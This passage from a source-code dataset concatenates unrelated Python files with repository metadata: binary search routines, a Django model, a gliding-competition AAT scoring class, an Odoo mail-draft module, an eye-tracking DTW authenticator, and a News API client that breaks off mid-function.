] | permissive | uddeshyatyagi/Ds-Algo-ML | 7974942f8e74bbaa3330af042c3b2bc7ff4be52e | 9cd5f0dd8ec2c6df44edd9fb7e1d37d22a986d2d | refs/heads/main | 2023-02-06T05:32:57.459332 | 2020-10-23T19:24:06 | 2020-10-23T19:24:06 | 305,129,611 | 0 | 1 | MIT | 2020-10-21T07:36:33 | 2020-10-18T15:11:54 | Jupyter Notebook | UTF-8 | Python | false | false | 2,733 | py |
import bisect
def bisect_left(sorted_collection, item, lo=0, hi=None):
if hi is None:
hi = len(sorted_collection)
while lo < hi:
mid = (lo + hi) // 2
if sorted_collection[mid] < item:
lo = mid + 1
else:
hi = mid
return lo
def bisect_right(sorted_collection, item, lo=0, hi=None):
if hi is None:
hi = len(sorted_collection)
while lo < hi:
mid = (lo + hi) // 2
if sorted_collection[mid] <= item:
lo = mid + 1
else:
hi = mid
return lo
def insort_left(sorted_collection, item, lo=0, hi=None):
sorted_collection.insert(bisect_left(sorted_collection, item, lo, hi), item)
def insort_right(sorted_collection, item, lo=0, hi=None):
sorted_collection.insert(bisect_right(sorted_collection, item, lo, hi), item)
def binary_search(sorted_collection, item):
left = 0
right = len(sorted_collection) - 1
while left <= right:
midpoint = left + (right - left) // 2
current_item = sorted_collection[midpoint]
if current_item == item:
return midpoint
elif item < current_item:
right = midpoint - 1
else:
left = midpoint + 1
return None
def binary_search_std_lib(sorted_collection, item):
index = bisect.bisect_left(sorted_collection, item)
if index != len(sorted_collection) and sorted_collection[index] == item:
return index
return None
def binary_search_by_recursion(sorted_collection, item, left, right):
if right < left:
return None
midpoint = left + (right - left) // 2
if sorted_collection[midpoint] == item:
return midpoint
elif sorted_collection[midpoint] > item:
return binary_search_by_recursion(sorted_collection, item, left, midpoint - 1)
else:
return binary_search_by_recursion(sorted_collection, item, midpoint + 1, right)
def __assert_sorted(collection):
if collection != sorted(collection):
raise ValueError("Collection must be ascending sorted")
return True
if __name__ == "__main__":
import sys
user_input = input("Enter numbers separated by comma:\n").strip()
collection = [int(item) for item in user_input.split(",")]
try:
__assert_sorted(collection)
except ValueError:
sys.exit("Sequence must be ascending sorted to apply binary search")
target_input = input("Enter a single number to be found in the list:\n")
target = int(target_input)
result = binary_search(collection, target)
if result is not None:
print(f"{target} found at positions: {result}")
else:
print("Not found")
| [
"uddeshyatyagi775@gmail.com"
] | uddeshyatyagi775@gmail.com |
0f58a8a16e9d3081549963a9efac5d9f24e9b245 | dd046ba0927e651fa490780ebdd5d30eaa292595 | /api/models.py | 804d5957d3cbd8c708992e8c2f829ef61b2f4cd0 | [] | no_license | ashrafulislamemon/django-rest-Frame_notes | 5760e66b3c0672d57bb8d9a8933e8df2f516cc42 | 0af50a60a050e37f8ea4b22006cee345223ffd36 | refs/heads/master | 2023-02-13T17:33:44.094721 | 2021-01-05T15:42:59 | 2021-01-05T15:42:59 | 327,042,907 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 200 | py | from django.db import models
# Create your models here.
class Student(models.Model):
name=models.CharField(max_length=30)
roll=models.IntegerField()
city=models.CharField(max_length=30)
| [
"75039527+ashrafulislamemon@users.noreply.github.com"
] | 75039527+ashrafulislamemon@users.noreply.github.com |
e517a4e977ffd0b1e18504e754d6ce20511c5237 | bcf9dd812926ffcbe57a3cfc821324913fec5391 | /opensoar/task/aat.py | a8f282a6c26cc0f662fcde6591a6e91e5472d0cc | [
"MIT"
] | permissive | jkretz/opensoar | 3e2c6fa817e87f55024f47556ea1619b3ed6b1bc | e330c4697284c1f79f85f1c2fc7400fd6246dbe0 | refs/heads/master | 2023-07-25T03:58:17.623761 | 2018-08-01T20:26:25 | 2018-08-01T20:26:25 | 153,887,721 | 0 | 0 | MIT | 2018-10-20T09:01:13 | 2018-10-20T09:01:13 | null | UTF-8 | Python | false | false | 15,624 | py | import datetime
from copy import deepcopy
from opensoar.task.task import Task
from opensoar.utilities.helper_functions import double_iterator, calculate_distance, \
calculate_bearing, calculate_destination, seconds_time_difference_fixes, add_times
class AAT(Task):
"""
Assigned Area Task.
"""
    def __init__(self, waypoints, t_min: datetime.timedelta, timezone: int=None, start_opening: datetime.time=None,
                 start_time_buffer: int=0, multistart: bool=False):
        """
        :param waypoints: task waypoints, passed through to Task
        :param t_min: minimal time to complete the task; a completed flight
                      faster than this is scored over t_min
                      (see _determine_finish_time)
        :param timezone: see Task
        :param start_opening: see Task
        :param start_time_buffer: see Task
        :param multistart: see Task
        """
        super().__init__(waypoints, timezone, start_opening, start_time_buffer, multistart)
        self._t_min = t_min
        # leg distances between the waypoint fixes, computed once at
        # construction (requires self.waypoints, hence after super().__init__)
        self._nominal_distances = self._calculate_nominal_distances()
def __eq__(self, other):
if self.t_min != other.t_min:
return False
else:
return super().__eq__(other)
    @property
    def t_min(self):
        """Minimal time (datetime.timedelta) to complete the task."""
        return self._t_min
def _calculate_nominal_distances(self):
distances = list()
for start_waypoint, end_waypoint in double_iterator(self.waypoints):
distance = calculate_distance(start_waypoint.fix, end_waypoint.fix)
distances.append(distance)
return distances
def apply_rules(self, trace):
fixes, outlanding_fix = self._calculate_trip_fixes(trace)
start_time = self.determine_refined_start(trace, fixes)
distances = self._determine_trip_distances(fixes, outlanding_fix)
finish_time = self._determine_finish_time(fixes, outlanding_fix)
return fixes, start_time, outlanding_fix, distances, finish_time
def _determine_finish_time(self, fixes, outlanding_fix):
total_trip_time = seconds_time_difference_fixes(fixes[0], fixes[-1])
minimum_trip_time = self._t_min.total_seconds()
if outlanding_fix is None and total_trip_time < minimum_trip_time:
finish_time = add_times(fixes[0]['time'], self._t_min)
else:
finish_time = fixes[-1]['time']
return finish_time
    def _calculate_trip_fixes(self, trace):
        """Determine the scored fix per waypoint and the outlanding fix, if any.

        Strategy: collect the fixes inside each sector, maximize the scored
        distance over a reduced subset of those fixes (coarse pass), then
        refine around the coarse optimum and maximize once more.

        :param trace: list of GPS fixes of the flight
        :return: (trip_fixes, outlanding_fix); outlanding_fix is None when
                 the task was completed
        """
        sector_fixes, enl_outlanding_fix = self._get_sector_fixes(trace)
        # cap the number of fixes per sector to keep the distance
        # maximization tractable
        reduced_sector_fixes = self._reduce_sector_fixes(sector_fixes, max_fixes_sector=300)
        # a completed task yields one fix group per waypoint (no_legs + 1)
        outlanded = len(sector_fixes) != self.no_legs+1
        if outlanded:
            # fixes after the last reached sector are outlanding candidates
            outside_sector_fixes = self._get_outside_sector_fixes(trace, sector_fixes, enl_outlanding_fix)
            reduced_outside_sector_fixes = self._reduce_fixes(outside_sector_fixes, max_fixes=300)
            waypoint_fixes = self._get_waypoint_fixes(outlanded, reduced_sector_fixes, reduced_outside_sector_fixes)
            # coarse maximization, then refine around that optimum and redo
            max_distance_fixes = self._compute_max_distance_fixes(outlanded, waypoint_fixes)
            waypoint_fixes = self._refine_max_distance_fixes(outlanded, max_distance_fixes, sector_fixes,
                                                             reduced_outside_sector_fixes)
            max_distance_fixes = self._compute_max_distance_fixes(outlanded, waypoint_fixes)
            # last maximized entry is the scored outlanding fix
            trip_fixes = max_distance_fixes[:-1]
            outlanding_fix = max_distance_fixes[-1]
        else:
            max_distance_fixes = self._compute_max_distance_fixes(outlanded, reduced_sector_fixes)
            waypoint_fixes = self._refine_max_distance_fixes(outlanded, max_distance_fixes, sector_fixes)
            max_distance_fixes = self._compute_max_distance_fixes(outlanded, waypoint_fixes)
            trip_fixes = max_distance_fixes
            outlanding_fix = None
        return trip_fixes, outlanding_fix
def _determine_trip_distances(self, fixes, outlanding_fix):
distances = list()
for leg, (fix1, fix2) in enumerate(double_iterator(fixes)):
distance = self._calculate_distance_completed_leg(leg, fix1, fix2)
distances.append(distance)
if outlanding_fix is not None:
outlanding_leg = len(fixes) - 1
distance = self._calculate_distance_outlanding_leg(outlanding_leg, fixes[-1], outlanding_fix)
distances.append(distance)
return distances
    def _get_sector_fixes(self, trace):
        """Collect, per reached waypoint, the trace fixes inside its sector.

        Walks the trace as a state machine over the current leg. The engine
        noise level (ENL) is watched as well: a sufficiently long ENL burst
        after the first sector ends the scored part of the flight (ENL
        outlanding); on the first leg a restart clears a pending burst.

        :param trace: list of GPS fixes of the flight
        :return: (sector_fixes, enl_outlanding_fix); sector_fixes has one
                 fix list per reached waypoint, enl_outlanding_fix is the
                 first fix of a registered ENL burst or None
        """
        current_leg = -1  # not yet started
        sector_fixes = list()
        enl_first_fix = None       # first fix of the current ENL burst, if any
        enl_registered = False     # burst long enough to count as engine run
        for fix_minus1, fix in double_iterator(trace):
            # check ENL when aircraft logs ENL and no ENL outlanding has taken place
            if not enl_registered and self.enl_value_exceeded(fix):
                if enl_first_fix is None:
                    enl_first_fix = fix
                enl_time = seconds_time_difference_fixes(enl_first_fix, fix)
                if self.enl_time_exceeded(enl_time):
                    enl_registered = True
                    if current_leg > 0:
                        # engine run after the first sector: stop scoring here
                        break
            elif not enl_registered:
                # noise dropped below the limit before the burst counted
                enl_first_fix = None
            if current_leg == -1:  # before start
                if self.started(fix_minus1, fix):
                    self._add_aat_sector_fix(sector_fixes, 0, fix_minus1)  # at task start point
                    current_leg = 0
                    enl_registered = False
                    enl_first_fix = None
            elif current_leg == 0:  # first leg, re-start still possible
                if self.started(fix_minus1, fix):  # restart
                    sector_fixes[0] = [fix_minus1]  # at task start point
                    current_leg = 0
                    enl_registered = False
                    enl_first_fix = None
                elif self.waypoints[1].inside_sector(fix_minus1):  # first sector
                    if enl_registered:
                        break  # break when ENL is used and not restarted
                    self._add_aat_sector_fix(sector_fixes, 1, fix_minus1)
                    current_leg += 1
            elif 0 < current_leg < self.no_legs - 1:  # at least second leg, no re-start possible
                if self.waypoints[current_leg].inside_sector(fix_minus1):  # previous waypoint
                    self._add_aat_sector_fix(sector_fixes, current_leg, fix_minus1)
                elif self.waypoints[current_leg + 1].inside_sector(fix_minus1):  # next waypoint
                    self._add_aat_sector_fix(sector_fixes, current_leg + 1, fix_minus1)
                    current_leg += 1
            elif current_leg == self.no_legs - 1:  # last leg
                if self.waypoints[current_leg].inside_sector(fix_minus1):
                    self._add_aat_sector_fix(sector_fixes, current_leg, fix_minus1)
                elif self.finished(fix_minus1, fix):
                    sector_fixes.append([fix])  # at task finish point
                    break
        # add last fix to sector if not already present (only for area
        # sectors, not for a finish line)
        last_fix = trace[-1]
        last_waypoint = self.waypoints[current_leg]
        if not last_waypoint.is_line and last_waypoint.inside_sector(last_fix) and last_fix is not sector_fixes[-1][-1]:
            sector_fixes[-1].append(last_fix)
        if enl_registered:
            return sector_fixes, enl_first_fix
        else:
            return sector_fixes, None
def _reduce_fixes(self, fixes, max_fixes):
reduction_factor = len(fixes) // max_fixes + 1
return fixes[0::reduction_factor]
def _reduce_sector_fixes(self, sector_fixes, max_fixes_sector):
reduced_sector_fixes = list()
for sector, fixes in enumerate(sector_fixes):
reduced_fixes = self._reduce_fixes(fixes, max_fixes_sector)
reduced_sector_fixes.append(reduced_fixes)
return reduced_sector_fixes
def _get_outside_sector_fixes(self, trace, sector_fixes, enl_outlanding_fix):
last_sector_fix = sector_fixes[-1][-1]
last_sector_index = trace.index(last_sector_fix)
outside_sector_fixes = list()
if enl_outlanding_fix is not None:
enl_outlanding_index = trace.index(enl_outlanding_fix)
if enl_outlanding_index > last_sector_index:
outside_sector_fixes = trace[last_sector_index + 1: enl_outlanding_index + 1]
else:
outside_sector_fixes = trace[last_sector_index+1:]
return outside_sector_fixes
def _add_aat_sector_fix(self, sector_fixes, taskpoint_index, fix):
if len(sector_fixes) < (taskpoint_index + 1):
sector_fixes.append([fix])
else:
sector_fixes[taskpoint_index].append(fix)
def _compute_max_distance_fixes(self, outlanded, waypoint_fixes):
distances = self._calculate_distances_between_sector_fixes(outlanded, waypoint_fixes)
# determine index on last sector/outlanding-group with maximum distance
max_dist = 0
maximized_dist_index = None
for index, distance in enumerate(distances[-1]):
if distance[0] > max_dist:
max_dist = distance[0]
maximized_dist_index = index
last_fix = waypoint_fixes[-1][maximized_dist_index]
max_distance_fixes = [last_fix]
index = maximized_dist_index
legs = len(waypoint_fixes) - 1
for leg in list(reversed(range(legs))):
index = distances[leg + 1][index][1]
max_distance_fix = waypoint_fixes[leg][index]
max_distance_fixes.insert(0, max_distance_fix)
return max_distance_fixes
def _calculate_distances_between_sector_fixes(self, outlanded, waypoint_fixes):
distances = [[]] * len(waypoint_fixes)
distances[0] = [[0, 0]] * len(waypoint_fixes[0])
completed_legs = len(waypoint_fixes) - 1
if outlanded:
completed_legs -= 1
for leg in range(completed_legs): # successful legs
distances[leg + 1] = [[0, 0] for _ in range(len(waypoint_fixes[leg + 1]))]
for fix2_index, fix2 in enumerate(waypoint_fixes[leg + 1]):
for fix1_index, fix1 in enumerate(waypoint_fixes[leg]):
distance = self._calculate_distance_completed_leg(leg, fix1, fix2)
total_distance = distances[leg][fix1_index][0] + distance
if total_distance > distances[leg + 1][fix2_index][0]:
distances[leg + 1][fix2_index] = [total_distance, fix1_index]
if outlanded:
leg = completed_legs
distances[leg + 1] = [[0, 0] for _ in range(len(waypoint_fixes[leg + 1]))]
for fix2_index, fix2 in enumerate(waypoint_fixes[leg + 1]):
for fix1_index, fix1 in enumerate(waypoint_fixes[leg][0:fix2_index+1]):
distance = self._calculate_distance_outlanding_leg(leg, fix1, fix2)
total_distance = distances[leg][fix1_index][0] + distance
if total_distance > distances[leg + 1][fix2_index][0]:
distances[leg + 1][fix2_index] = [total_distance, fix1_index]
return distances
def _refine_max_distance_fixes(self, outlanded, max_distance_fixes, sector_fixes, outside_sector_fixes=None):
"""look around fixes whether more precise fixes can be found, increasing the distance"""
if outside_sector_fixes is None:
outside_sector_fixes = []
refinement_fixes = 10
waypoint_fixes = [[max_distance_fixes[0]]] # already include start fix
successfull_legs = len(max_distance_fixes) - 1
if outlanded:
successfull_legs -= 1
for leg in range(len(max_distance_fixes) - 1):
on_outlanding_leg = outlanded and leg > successfull_legs - 1
fix = max_distance_fixes[leg+1]
if on_outlanding_leg:
if outside_sector_fixes:
fixes = outside_sector_fixes
else:
fixes = sector_fixes[leg]
else:
fixes = sector_fixes[leg + 1]
refinement_end, refinement_start = self._get_refinement_bounds(fix, fixes, refinement_fixes)
waypoint_fixes.append(fixes[refinement_start:refinement_end])
return waypoint_fixes
def _get_refinement_bounds(self, fix, fixes, refinement_fixes):
"""
:param fix:
:param fixes:
:param refinement_fixes: this number of fixes before and after each fix
:return:
"""
max_distance_index = fixes.index(fix)
refinement_start = max(max_distance_index - refinement_fixes, 0)
refinement_end = min(len(fixes) + 1, max_distance_index + refinement_fixes + 1)
return refinement_end, refinement_start
def _calculate_distance_outlanding_leg(self, leg, start_tp_fix, outlanding_fix):
    """Distance credited on the leg where the outlanding occurred.

    The distance is measured towards the closest point of the next
    turnpoint's area (or the finish point on the last leg), minus the
    remaining distance from the outlanding position to that point.

    :param leg: zero-based leg index on which the outlanding happened
    :param start_tp_fix: fix chosen at the waypoint starting this leg
    :param outlanding_fix: the outlanding position fix
    :return: credited distance for this partial leg
    """
    if leg == 0:
        tp1 = self.waypoints[leg + 1]
        bearing = calculate_bearing(start_tp_fix, outlanding_fix)
        closest_area_fix = calculate_destination(start_tp_fix, tp1.r_max, bearing)
        distance = calculate_distance(self.start.fix, closest_area_fix)
        distance -= calculate_distance(outlanding_fix, closest_area_fix)
    elif leg == self.no_legs - 1:  # take finish-point of task
        distance = calculate_distance(start_tp_fix, self.finish.fix)
        distance -= calculate_distance(self.finish.fix, outlanding_fix)
    else:
        tp1 = self.waypoints[leg + 1]
        bearing = calculate_bearing(tp1.fix, outlanding_fix)
        closest_area_fix = calculate_destination(tp1.fix, tp1.r_max, bearing)
        # Removed an unreachable inner ``if leg == 0`` branch: this arm is
        # only entered when leg != 0 (handled by the first condition above).
        distance = calculate_distance(start_tp_fix, closest_area_fix)
        distance -= calculate_distance(outlanding_fix, closest_area_fix)
    return distance
def _calculate_distance_completed_leg(self, leg, start_tp_fix, end_tp_fix):
    """Scored distance for a fully flown leg; the first and last legs
    apply the task start/finish point and its 'shorten_legs' correction."""
    if leg == 0:  # first leg: measured from the task start point
        start = self.waypoints[0]
        distance = calculate_distance(start.fix, end_tp_fix)
        if start.distance_correction == 'shorten_legs':
            distance -= start.r_max
        return distance
    if leg == self.no_legs - 1:  # last leg: measured to the task finish point
        finish = self.waypoints[-1]
        distance = calculate_distance(start_tp_fix, finish.fix)
        if finish.distance_correction == 'shorten_legs':
            distance -= finish.r_max
        return distance
    # intermediate leg: plain fix-to-fix distance
    return calculate_distance(start_tp_fix, end_tp_fix)
def _get_waypoint_fixes(self, outlanded, sector_fixes, outside_sector_fixes=None):
"""
Waypoint fixes are fixes which can be used for the distance optimisation. They are grouped per waypoint. In
case of an outlanding, the last sector waypoints are duplicated at the enable optimisation inside the sector.
Optional fixes outside the sector on the outlanding leg are also added in the last list.
:param outlanded:
:param sector_fixes:
:param outside_sector_fixes:
:return:
"""
if outside_sector_fixes is None:
outside_sector_fixes = list()
waypoint_fixes = deepcopy(sector_fixes)
if outlanded:
waypoint_fixes.append(sector_fixes[-1])
waypoint_fixes[-1].extend(outside_sector_fixes)
return waypoint_fixes
| [
"GliderGeek@users.noreply.github.com"
] | GliderGeek@users.noreply.github.com |
dfeae749b48534bb374a945d0bfda2df5bebe3d4 | 9ddfd30620c39fb73ac57e79eae0a001c45db45f | /addons/prt_mail_messages_draft/models/prt_mail_draft.py | 4e5815554dc290a8168928d341b09e81ec8f574e | [] | no_license | zamzamintl/silver | a89bacc1ba6a7a59de1a92e3f7c149df0468e185 | 8628e4419c4ee77928c04c1591311707acd2465e | refs/heads/master | 2023-01-06T20:29:25.372314 | 2020-10-29T21:02:41 | 2020-10-29T21:02:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,658 | py | from odoo import models, fields, api, _, tools
# import logging
# _logger = logging.getLogger(__name__)
# -- Select draft
def _select_draft(draft):
    """Return the act_window action that reopens *draft* in the mail
    composer, pre-filling the composer defaults from the draft record.
    Returns None when *draft* is falsy.
    """
    if not draft:
        return None
    composer_context = {
        'default_res_id': draft.res_id,
        'default_model': draft.model,
        'default_parent_id': draft.parent_id,
        'default_partner_ids': draft.partner_ids.ids or False,
        'default_attachment_ids': draft.attachment_ids.ids or False,
        'default_is_log': False,
        'default_subject': draft.subject,
        'default_body': draft.body,
        'default_subtype_id': draft.subtype_id.id,
        'default_message_type': 'comment',
        'default_current_draft_id': draft.id,
        'default_signature_location': draft.signature_location,
        'default_wizard_mode': draft.wizard_mode,
    }
    return {
        'name': _("New message"),
        "views": [[False, "form"]],
        'res_model': 'mail.compose.message',
        'type': 'ir.actions.act_window',
        'target': 'new',
        'context': composer_context,
    }
######################
# Mail.Message.Draft #
######################
class PRTMailMessageDraft(models.Model):
    """Stored draft of a chatter message that can be reopened in the
    mail composer (see ``_select_draft``)."""
    _name = "prt.mail.message.draft"
    _description = "Draft Message"
    _order = 'write_date desc, id desc'
    _rec_name = 'subject'

    # -- Set domain for subtype_id
    def _get_subtypes(self):
        """Restrict selectable subtypes to 'Discussions' and 'Note'."""
        return [('id', 'in', [self.env['ir.model.data'].xmlid_to_res_id('mail.mt_comment'),
                              self.env['ir.model.data'].xmlid_to_res_id('mail.mt_note')])]

    subject = fields.Char(string="Subject")
    subject_display = fields.Char(string="Subject", compute="_subject_display")
    body = fields.Html(string="Contents", default="", sanitize_style=True, strip_classes=True)
    # Fixed typo: the keyword was misspelled 'sting', so Odoo silently
    # ignored it and the label fell back to the technical field name.
    model = fields.Char(string="Related Document Model", index=True)
    res_id = fields.Integer(string="Related Document ID", index=True)
    subtype_id = fields.Many2one(string="Message Type", comodel_name='mail.message.subtype',
                                 domain=_get_subtypes,
                                 default=lambda self: self.env['ir.model.data'].xmlid_to_res_id('mail.mt_comment'),
                                 required=True)
    parent_id = fields.Integer(string="Parent Message")
    author_id = fields.Many2one(string="Author", comodel_name='res.partner', index=True,
                                ondelete='set null',
                                default=lambda self: self.env.user.partner_id.id)
    partner_ids = fields.Many2many(string="Recipients", comodel_name='res.partner')
    record_ref = fields.Reference(string="Message Record", selection='_referenceable_models',
                                  compute='_record_ref')
    attachment_ids = fields.Many2many(string="Attachments", comodel_name='ir.attachment',
                                      relation='prt_message_draft_attachment_rel',
                                      column1='message_id',
                                      column2='attachment_id')
    ref_partner_ids = fields.Many2many(string="Followers", comodel_name='res.partner',
                                       compute='_message_followers')
    ref_partner_count = fields.Integer(string="Followers", compute='_ref_partner_count')
    wizard_mode = fields.Char(string="Wizard Mode", default='composition')
    signature_location = fields.Selection([
        ('b', 'Before quote'),
        ('a', 'Message bottom'),
        ('n', 'No signature')
    ], string='Signature Location', default='b', required=True,
        help='Whether to put signature before or after the quoted text.')

    # -- Count ref Partners
    def _ref_partner_count(self):
        for rec in self:
            rec.ref_partner_count = len(rec.ref_partner_ids)

    # -- Get related record followers
    @api.depends('record_ref')
    def _message_followers(self):
        for rec in self:
            if rec.record_ref:
                rec.ref_partner_ids = rec.record_ref.message_partner_ids
            else:
                # A compute method must assign the field for every record;
                # the original left it unset for drafts without a reference.
                rec.ref_partner_ids = False

    # -- Get Subject for tree view
    @api.depends('subject')
    def _subject_display(self):
        # Get model names first. Use this method to get translated values
        ir_models = self.env['ir.model'].search([('model', 'in', list(set(self.mapped('model'))))])
        model_dict = {}
        for model in ir_models:
            # Check if model has "name" field
            has_name = self.env['ir.model.fields'].sudo().search_count([('model_id', '=', model.id),
                                                                        ('name', '=', 'name')])
            model_dict.update({model.model: [model.name, has_name]})
        # Compose subject
        for rec in self:
            subject_display = '=== No Reference ==='
            # Has reference
            if rec.record_ref:
                # Guard against models missing from ir.model: the previous
                # unchecked ``model_dict.get(rec.model)[0]`` crashed with
                # 'NoneType is not subscriptable' in that case.
                model_name, has_name = model_dict.get(rec.model, (rec.model, 0))
                subject_display = model_name
                # Has 'name' field
                if has_name:
                    subject_display = "%s: %s" % (subject_display, rec.record_ref.name)
            # Has subject
            if rec.subject:
                subject_display = "%s => %s" % (subject_display, rec.subject)
            # Set subject
            rec.subject_display = subject_display

    # -- Ref models
    @api.model
    def _referenceable_models(self):
        return [(x.model, x.name) for x in self.env['ir.model'].sudo().search([('model', '!=', 'mail.channel')])]

    # -- Compose reference
    @api.depends('res_id')
    def _record_ref(self):
        for rec in self:
            record = False
            if rec.res_id and rec.model:
                res = self.env[rec.model].sudo().search([("id", "=", rec.res_id)])
                if res:
                    record = res
            # Always assign so the compute never leaves the field unset
            # (the original skipped assignment when res_id was falsy).
            rec.record_ref = record

    # -- Send message
    def send_it(self):
        """Open the mail composer pre-filled from this draft."""
        self.ensure_one()
        return _select_draft(self)
###############
# Mail.Thread #
###############
class PRTMailThread(models.AbstractModel):
    """mail.thread extension: garbage-collects drafts of deleted records."""
    _name = "mail.thread"
    _inherit = "mail.thread"

    # -- Unlink: delete all drafts of the records being deleted
    def unlink(self):
        """Delete drafts referencing the records being unlinked, then
        delegate to the standard unlink."""
        if not self._name == 'prt.mail.message.draft':
            # Drafts reference their record via the (model, res_id) pair —
            # see the identical filter in the composer's send_mail cleanup.
            # The previous filter used ('id', 'in', self.ids), matching the
            # drafts' own ids against unrelated record ids, which deleted
            # the wrong drafts and left orphans behind.
            self.env['prt.mail.message.draft'].sudo().search(
                [('model', '=', self._name),
                 ('res_id', 'in', self.ids)]).sudo().unlink()
        return super().unlink()
########################
# Mail.Compose Message #
########################
class PRTMailComposer(models.TransientModel):
    """Mail composer wizard extended with draft save/restore support."""
    _inherit = 'mail.compose.message'
    _name = 'mail.compose.message'

    # Draft currently being edited, set when the wizard was opened from one.
    current_draft_id = fields.Many2one(string="Draft", comodel_name='prt.mail.message.draft')

    # -- Save draft wrapper
    def _save_draft(self, draft):
        """Persist the composer state into *draft*, or create a new
        prt.mail.message.draft when none is given.

        :param draft: existing draft record (possibly an empty recordset)
        :return: ``write()`` result (bool) when updating, or the newly
            created draft record — callers must handle both (see save_draft).
        """
        self.ensure_one()
        if draft:
            # Update existing draft
            res = draft.write({
                'res_id': self.res_id,
                'model': self.model,
                'parent_id': self.parent_id.id,
                'author_id': self.author_id.id,
                'partner_ids': [(6, False, self.partner_ids.ids)],
                'attachment_ids': [(6, False, self.attachment_ids.ids)],
                'subject': self.subject,
                'signature_location': self.signature_location,
                'body': self.body,
                'wizard_mode': self.wizard_mode,
                'subtype_id': self.subtype_id.id,
            })
        else:
            # Create new draft
            res = self.env['prt.mail.message.draft'].create({
                'res_id': self.res_id,
                'model': self.model,
                'parent_id': self.parent_id.id,
                'author_id': self.author_id.id,
                'partner_ids': [(4, x, False) for x in self.partner_ids.ids],
                'attachment_ids': [(4, x, False) for x in self.attachment_ids.ids],
                'subject': self.subject,
                'signature_location': self.signature_location,
                'wizard_mode': self.wizard_mode,
                'body': self.body,
                'subtype_id': self.subtype_id.id,
            })
        return res

    # -- Save draft button
    def save_draft(self):
        """Button handler: persist the draft and decide what to show next."""
        # Save or create draft
        res = self._save_draft(self.current_draft_id)
        # If just save
        if self._context.get('save_mode', False) == 'save':
            # Reopen current draft
            if self.current_draft_id:
                return _select_draft(self.current_draft_id)
            # .. or newly created
            return _select_draft(res)
        # If in 'compose mode'
        if self.wizard_mode == 'compose':
            return self.env['ir.actions.act_window'].for_xml_id('prt_mail_messages_draft',
                                                                'action_prt_mail_messages_draft')
        # Implicit None: no follow-up action is returned to the client.
        return

    # -- Override send
    def send_mail(self, auto_commit=False):
        """Send the message, then drop the now-obsolete drafts for this
        record and, in 'compose mode', return to the messages list."""
        # Send message
        res = super().send_mail(auto_commit=auto_commit)
        # Delete drafts modified by current user.
        # NOTE(review): this filters on the wizard's create_uid — presumably
        # the current user, since the transient record was just created by
        # them; confirm this also holds when an admin sends on their behalf.
        self.env['prt.mail.message.draft'].sudo().search([('model', '=', self.model),
                                                          ('res_id', '=', self.res_id),
                                                          ('write_uid', '=', self.create_uid.id)]).sudo().unlink()
        # If in 'compose mode'
        if self._context.get('wizard_mode', False) == 'compose':
            res = self.env['ir.actions.act_window'].for_xml_id('prt_mail_messages', 'action_prt_mail_messages')
        return res
| [
"mohamed.abdelrahman@businessborderlines.com"
] | mohamed.abdelrahman@businessborderlines.com |
d9116447940183782d77eb606f0d77ce6d21e8e3 | 7dc7b55c9fa6d7f5c6fba416fdd67367e7648beb | /tools/answer_authenticator.py | 6384256e962ebfeb90ca809699c00d375cfaa1f7 | [] | no_license | kunihik0/eye-pass | 7c39a35a28bf060fa2c2c11ea5bf86a94afb9f0d | 33bf3cd03ef2143c440b4ca7a428ed5f03a3245f | refs/heads/master | 2023-03-08T06:24:13.332006 | 2021-02-21T08:52:33 | 2021-02-21T08:52:33 | 271,292,524 | 0 | 0 | null | 2021-02-21T08:52:34 | 2020-06-10T14:02:11 | Python | UTF-8 | Python | false | false | 715 | py | import math
import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
sys.path.append("../")
sys.path.append("../tools/")
sys.path.append("../answer_data/")
import numpy as np
import pandas as pd
from tools.evaluator import Evaluator
class Answer_Authenticator(object):
    """Authenticates an eye-tracking answer by comparing two gaze traces
    with DTW and accepting them when their distance is below a threshold."""

    def __init__(self):
        pass

    def authenticator(self, np1, np2, threshold):
        """Compare traces *np1* and *np2* via DTW with an L2 point metric.

        :param np1: first gaze trace
        :param np2: second gaze trace
        :param threshold: maximum DTW distance accepted as a match
        :return: True on success, False on failure (verdict is also printed)
        """
        dtw = Evaluator().calc_dtw
        func_dist = Evaluator().l2norm
        distance = dtw(np1, np2, func_dist)[-1][-1][0]
        # Propagate the verdict instead of discarding it.
        return self.judgment(distance, threshold)

    def judgment(self, distance, threshold):
        """Print and return the authentication verdict.

        :return: True when ``distance < threshold``, else False
        """
        if distance < threshold:
            print("success!")  # fixed the misspelled "succes!"
            return True
        print("failure")
        return False
| [
"tokuko2yuu.nikkorishiyou@gmail.com"
] | tokuko2yuu.nikkorishiyou@gmail.com |
59885a78501ecb843e715b9bd5e038d150ba4db8 | cccc5d20b81ec58f2941765d3b88b3fbfe2cedc9 | /app/request.py | 8318de4e13f1493675425f0c72fdac1cca63e131 | [
"MIT"
] | permissive | adosamjeshi/News-highlight | 78d87a56cc7bb1902ccb5ace995be9d6d4327938 | c1e469c8a4b493e5fad07b264da100e537717018 | refs/heads/master | 2022-07-04T10:06:23.083289 | 2020-05-12T14:27:19 | 2020-05-12T14:27:19 | 263,355,411 | 0 | 0 | MIT | 2020-05-12T22:21:39 | 2020-05-12T14:08:43 | Python | UTF-8 | Python | false | false | 3,312 | py | import urllib.request
import json
from .models import News, Sources
# getting api key
api_key = None
# getting the news base url
base_url = None
def configure_request(app):
    """Copy the News API key and base url from the Flask app config into
    this module's globals (call once during app initialisation)."""
    global api_key, base_url
    api_key = app.config["NEWS_API_KEY"]
    base_url = app.config["NEWS_API_BASE_URL"]
def get_news(category):
    """Fetch articles for *category* from the News API.

    :param category: category slug interpolated into the configured base url
    :return: list of News objects, or None when no articles came back
    """
    request_url = base_url.format(category, api_key)
    with urllib.request.urlopen(request_url) as response:
        payload = json.loads(response.read())
    news_results = None
    if payload["articles"]:
        news_results = process_results(payload["articles"])
    return news_results
def search_news(topic):
    """Search all News API articles matching *topic*.

    :param topic: free-text query passed to the 'everything' endpoint
    :return: list of News objects, or None when nothing matched
    """
    query_url = "https://newsapi.org/v2/everything?q={}&apiKey={}".format(topic, api_key)
    with urllib.request.urlopen(query_url) as response:
        payload = json.loads(response.read())
    results = None
    if payload["articles"]:
        results = process_results(payload["articles"])
    return results
def sources_news():
    """Fetch the list of news sources from the News API.

    :return: list of Sources objects, or None when the response is empty
    """
    # Fixed a malformed URL: the scheme was 'https:/' (missing a slash) and
    # the query string lacked '=' after 'apiKey' (compare search_news's
    # correctly formed URL), so every request to this endpoint failed.
